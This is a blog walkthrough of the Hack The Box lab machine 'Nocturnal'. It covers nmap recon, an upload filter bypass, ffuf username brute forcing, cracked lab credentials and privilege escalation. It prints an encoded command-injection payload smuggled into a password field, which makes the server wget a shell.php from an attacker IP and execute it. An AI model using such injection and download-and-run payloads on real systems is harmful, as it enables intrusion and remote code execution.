# HTB-Nocturnal

2 min read
command-injection ffuf port-forwarding
Table of Contents 
Scope:
10.10.11.64

Recon

Nmap

Terminal window
sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn nocturnal.htb


PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Welcome to Nocturnal
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I registered an account as test - test123 and got the welcome screen:

I tried uploading a webshell and got this error:

I opened caido and started modifying the request:

I changed it to webshell.php.pdf:

I couldn’t access the files however:

gobuster

I ran a gobuster scan to enumerate the endpoints:

In caido I noticed these requests:

ffuf

So I tried brute forcing any usernames:

Terminal window
ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=webshell.pdf' -w /usr/share/seclists/Usernames/statistically-likely-usernames/john.txt -fs 2985 -t 100 -H 'Cookie: PHPSESSID=4k0p6cgchd4dvfk8ubfjsnb8tj'

I added them all to a users.txt file for further brute forcing.

I then went on to manipulate the request with the found usernames and found this:

amanda
arHkG7HAI68X8s1J

However I was not able to log in with this password:

Neither were any of the other 2 able to log in with this password:

This probably meant that I had to use these creds online:

I can create backups here:

Command Injection

However this didn’t give me anything juicy, but viewing the request I saw a potential Command Injection vulnerability:

password=%0Abash%09-c%09"wget%0910.10.14.17/shell.php"%0A&backup=
password=%0Abash%09-c%09"php%09shell.php"%0A&backup=

Foothold

Shell as www-data

I then upgraded my shell to a penelope shell:

Here I found this db:

I went ahead and downloaded it so I could view it with sqlite3:

I went ahead and cracked them using crackstation:

I found a valid set:

tobias
slowmotionapocalypse

Lateral Movement

user.txt

Privilege Escalation

Enumeration

I started off with linpeas.sh:

Port Forward

Let’s check it out:

I tried to brute force the creds, and the following combo worked:

admin
slowmotionapocalypse

From the source code I can find the version:

Let’s do some OSINT.

PoC -> root

I used the following poc:

root.txt

My avatar

Thanks for reading my blog post! Feel free to check out my other posts or contact me via the social links in the footer.

More Posts
Comments